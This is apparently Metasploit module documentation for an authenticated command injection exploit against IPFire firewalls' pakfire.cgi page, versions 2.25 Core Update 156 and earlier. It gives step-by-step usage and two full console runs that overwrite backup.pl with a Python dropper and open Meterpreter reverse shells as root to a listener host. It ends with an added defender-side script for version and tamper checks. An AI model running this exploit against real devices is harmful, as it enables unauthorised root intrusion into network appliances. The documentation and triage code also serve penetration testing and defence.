## Vulnerable Application

[IPFire 2.25 (Core Update 156)](https://downloads.ipfire.org/releases/ipfire-2.x/2.25-core156/ipfire-2.25.x86_64-full-core156.iso)

[IPFire 2.21 (Core Update 126)](https://mirror.csclub.uwaterloo.ca/ipfire/releases/ipfire-2.x/2.21-core126/ipfire-2.21.x86_64-full-core126.iso)

This module exploits an authenticated command injection vulnerability in the
`/cgi-bin/pakfire.cgi` web page of IPFire devices running versions 2.25 Core Update 156
and prior to execute arbitrary code as the `root` user.

## Verification Steps

1. Start msfconsole
1. Do: `use exploit/linux/http/ipfire_pakfire_exec`
1. Do: `set username <USERNAME OF THE ADMINISTRATIVE USER TO AUTHENTICATE TO THE WEB PORTAL AS>`
1. Do: `set password <PASSWORD FOR admin USER ON THE WEB PORTAL>`
1. Do: `set rhost <TARGET IP>`
1. Do: `set lhost <YOUR IP>`
1. Do: `exploit`
1. You should get a shell as the `root` user.

## Options

**USERNAME**

Username of the administrative user you are authenticating to the web portal as.

**PASSWORD**

Password for the administrative user you are authenticating to the web portal as.

## Scenarios

### IPFire 2.21 (Core Update 126)

```
msf6 > use exploit/linux/http/ipfire_pakfire_exec
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/ipfire_pakfire_exec) > show options

Module options (exploit/linux/http/ipfire_pakfire_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     444              yes       The target port (TCP)
   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python Dropper


msf6 exploit(linux/http/ipfire_pakfire_exec) > set RHOSTS 172.29.202.191
RHOSTS => 172.29.202.191
msf6 exploit(linux/http/ipfire_pakfire_exec) > set USERNAME admin
USERNAME => admin
msf6 exploit(linux/http/ipfire_pakfire_exec) > set PASSWORD admin
PASSWORD => admin
msf6 exploit(linux/http/ipfire_pakfire_exec) > set LHOST 172.29.202.153
LHOST => 172.29.202.153
msf6 exploit(linux/http/ipfire_pakfire_exec) > exploit

[*] Started reverse TCP handler on 172.29.202.153:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is running IPFire 2.21 (Core Update 126)
[*] Backing up backup.pl to /tmp/1TiE8...
[*] Overwriting the contents of backup.pl with a Python header statement
[*] Appending the contents of backup.pl with the Python code to be executed.
[*] Executing /usr/local/bin/backupctrl to run the payload
[*] Sending stage (39392 bytes) to 172.29.202.191
[*] Meterpreter session 1 opened (172.29.202.153:4444 -> 172.29.202.191:38336) at 2021-06-08 14:05:41 -0500
[+] You should now have your shell, restoring the original contents of the backup.pl file...
[*] All done, enjoy the shells!

meterpreter > sysinfo
Computer     : ipfire.localdomain
OS           : Linux 4.14.86-ipfire #1 SMP Tue Dec 11 08:36:08 GMT 2018
Architecture : x64
Meterpreter  : python/linux
meterpreter > getuid
Server username: root
meterpreter > shell
Process 28379 created.
Channel 1 created.
sh: cannot set terminal process group (27956): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.3# id
uid=0(root) gid=0(root) groups=0(root)
sh-4.3#
```

### IPFire 2.25 (Core Update 156)

```
msf6 > use exploit/linux/http/ipfire_pakfire_exec
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/ipfire_pakfire_exec) > show options

Module options (exploit/linux/http/ipfire_pakfire_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     444              yes       The target port (TCP)
   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python Dropper


msf6 exploit(linux/http/ipfire_pakfire_exec) > set RHOST 172.29.202.157
RHOST => 172.29.202.157
msf6 exploit(linux/http/ipfire_pakfire_exec) > set USERNAME admin
USERNAME => admin
msf6 exploit(linux/http/ipfire_pakfire_exec) > set PASSWORD admin
PASSWORD => admin
msf6 exploit(linux/http/ipfire_pakfire_exec) > set LHOST 172.29.202.153
LHOST => 172.29.202.153
msf6 exploit(linux/http/ipfire_pakfire_exec) > exploit

[*] Started reverse TCP handler on 172.29.202.153:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is running IPFire 2.25 (Core Update 156)
[*] Backing up backup.pl to /tmp/8Yndo...
[*] Overwriting the contents of backup.pl with a Python header statement
[*] Appending the contents of backup.pl with the Python code to be executed.
[*] Executing /usr/local/bin/backupctrl to run the payload
[*] Sending stage (39392 bytes) to 172.29.202.157
[*] Meterpreter session 1 opened (172.29.202.153:4444 -> 172.29.202.157:37192) at 2021-06-08 14:02:03 -0500
[+] You should now have your shell, restoring the original contents of the backup.pl file...
[*] All done, enjoy the shells!

meterpreter > sysinfo
Computer     : ipfire.localdomain
OS           : Linux 4.14.212-ipfire #1 SMP Tue May 4 09:02:54 GMT 2021
Architecture : x64
Meterpreter  : python/linux
meterpreter > getuid
Server username: root
meterpreter > shell
Process 10179 created.
Channel 1 created.
sh: cannot set terminal process group (10136): Inappropriate ioctl for device
sh: no job control in this shell
sh-5.0# id
uid=0(root) gid=0(root) groups=0(root)
sh-5.0#
```
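Defender-side triage for the two facts this page establishes: the affected version range stated under Vulnerable Application (2.25 Core Update 156 and prior) and the dropper behaviour visible in the scenario output (backup.pl overwritten with a Python header, then restored). This is an added example, not part of the module or of IPFire; the `BACKUP_PL` path and the sample file contents are assumptions constructed here.

```python
#!/usr/bin/env python3
"""Triage helpers: version-range check and backup.pl tamper check (added example)."""
import hashlib
import re

# Last affected release as stated on the page: IPFire 2.25 Core Update 156.
LAST_AFFECTED = (2, 25, 156)

# Assumed location of backup.pl on the appliance; adjust for the device under review.
BACKUP_PL = "/var/ipfire/backup/bin/backup.pl"

_VER_RE = re.compile(r"IPFire\s+(\d+)\.(\d+)\s*\(Core Update\s+(\d+)\)")


def affected_version(banner: str):
    """True/False for an 'IPFire X.Y (Core Update N)' banner, None if it does not parse."""
    m = _VER_RE.search(banner)
    if not m:
        return None
    major, minor, core = (int(g) for g in m.groups())
    return (major, minor, core) <= LAST_AFFECTED


def backup_script_tampered(content: bytes, baseline_sha256: str) -> list:
    """Return findings for the current backup.pl content; an empty list means clean."""
    findings = []
    first_line = content.split(b"\n", 1)[0].strip()
    # The module replaces the file with a Python header and appends its payload, so a
    # python interpreter line at the top of backup.pl is a red flag on its own.
    if first_line.startswith(b"#!") and b"python" in first_line.lower():
        findings.append("interpreter line points at python")
    # Any drift from a hash taken when the appliance was known-good is worth a look,
    # even though the module restores the original contents after it gets its shell.
    digest = hashlib.sha256(content).hexdigest()
    if digest != baseline_sha256:
        findings.append(f"sha256 {digest[:12]}... differs from baseline")
    return findings


# Constructed sample inputs (stand-ins, not real IPFire files).
ORIGINAL = b"#!/bin/bash\n# constructed stand-in for the shipped backup.pl\necho backup\n"
BASELINE = hashlib.sha256(ORIGINAL).hexdigest()
DROPPED = b"#!/usr/bin/python\nimport socket  # constructed stand-in for injected code\n"

if __name__ == "__main__":
    print(affected_version("IPFire 2.25 (Core Update 156)"))  # True
    print(backup_script_tampered(DROPPED, BASELINE))
```

Run `backup_script_tampered` against the live file and a hash recorded at install time; the interpreter-line check catches the in-flight state, the hash check catches anything else that changed.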